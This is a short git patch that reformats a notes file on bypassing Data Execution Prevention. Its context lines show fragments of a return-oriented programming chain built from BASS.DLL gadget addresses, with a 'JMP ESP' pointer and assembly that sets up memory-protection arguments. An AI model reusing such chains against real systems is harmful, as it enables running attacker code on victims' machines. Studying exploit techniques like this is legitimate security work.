From d1cb7293ae30693676c8b7a4ee011021770efbda Mon Sep 17 00:00:00 2001 From: Rev0x1337 <163394237+Rev0x1337@users.noreply.github.com> Date: Sun, 20 Oct 2024 07:10:09 +0300 Subject: [PATCH] Update bypass_DEP.txt --- bypass_DEP.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/bypass_DEP.txt b/bypass_DEP.txt index 616f931..6e7b841 100644 --- a/bypass_DEP.txt +++ b/bypass_DEP.txt @@ -1,3 +1,5 @@ +Example: + 0X10010157, # POP EBP # RETN [BASS.DLL] 0X10010157, # SKIP 4 BYTES [BASS.DLL] 0X10015F77, # POP EAX # RETN [BASS.DLL] @@ -19,7 +21,8 @@ 0X1001D7A5, # PUSHAD # RETN [BASS.DLL] 0X10022AA7, # PTR TO 'JMP ESP' [BASS.DLL] -In ASM +In ASM: + PUSH 0X201 PUSH 0X40 PUSH WRITEBLE_LOCATION